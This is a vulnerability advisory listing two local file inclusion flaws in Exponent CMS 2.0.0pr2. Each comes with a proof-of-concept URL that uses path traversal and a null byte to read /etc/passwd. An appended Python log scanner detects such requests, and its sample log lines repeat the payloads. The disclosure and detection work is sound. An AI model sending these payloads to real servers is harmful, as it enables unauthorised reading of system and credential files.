Exponent CMS 2.0.0pr2 Local File Inclusion

2010-12-07T00:00:00
ID PACKETSTORM:96465
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-12-07T00:00:00

Description

                                        
                                            `=============================  
Vulnerability ID: HTB22718  
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html  
Product: Exponent CMS  
Vendor: http://www.exponentcms.org/  
Vulnerable Version: 2.0.0pr2  
Vendor Notification: 22 November 2010   
Vulnerability Type: Local File Inclusion  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists because the "/rss.php" script fails to properly sanitize user-supplied input in the "module" variable.  
  
The following PoC is available:  
  
http://exponent/rss.php?module=../../../../../../../etc/passwd%00  
  
  
=============================  
Vulnerability ID: HTB22717  
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html  
Product: Exponent CMS  
Vendor: http://www.exponentcms.org/  
Vulnerable Version: 2.0.0pr2  
Vendor Notification: 22 November 2010   
Vulnerability Type: Local File Inclusion  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists because the "/podcast.php" script fails to properly sanitize user-supplied input in the "module" variable.  
  
The following PoC is available:  
  
  
http://exponent/podcast.php?module=../../../../../../../etc/passwd%00  
  
  
`
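
Since both issues are listed as not fixed, one way to spot requests of the kind shown in the two PoCs is to scan web server access logs for "module" values sent to /rss.php or /podcast.php that contain traversal sequences or a null byte. The following is an added example, not part of the High-Tech Bridge advisory or of Exponent CMS. It assumes Common Log Format access logs and that legitimate module names are plain identifiers; the log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

AFFECTED = ("/rss.php", "/podcast.php")  # scripts named in HTB22718 / HTB22717
# Assumption: legitimate module names are plain identifiers.
SAFE_MODULE = re.compile(rb"[A-Za-z0-9_]+\Z")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(raw: bytes, rounds: int = 3) -> bytes:
    """Percent-decode several times so nested encodings are normalised too."""
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)
    return raw

def classify(line: str) -> list:
    """Return the reasons a log line is suspicious, or [] if it is clean."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(AFFECTED):
        return []
    reasons = []
    for pair in re.split(r"[&;]", url.query):
        name, _, raw = pair.partition("=")
        if decode_fully(name.encode()) != b"module":
            continue
        value = decode_fully(raw.encode()).replace(b"\\", b"/")
        if b"\x00" in value:
            reasons.append("null byte")
        if b"../" in value or value.endswith(b".."):
            reasons.append("directory traversal")
        if value.startswith(b"/"):
            reasons.append("absolute path")
        if not reasons and not SAFE_MODULE.match(value):
            reasons.append("unexpected characters")
    return reasons

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Dec/2010:10:00:01 +0000] "GET /rss.php?module=newsmodule HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Dec/2010:10:00:05 +0000] "GET /rss.php?module=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1432',
    '198.51.100.7 - - [07/Dec/2010:10:00:09 +0000] "GET /podcast.php?module=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1432',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or "clean", entry.split('"')[1])
```

The same identifier-only rule can be enforced in front of the application (for example in a web application firewall or reverse proxy) until a vendor fix is available.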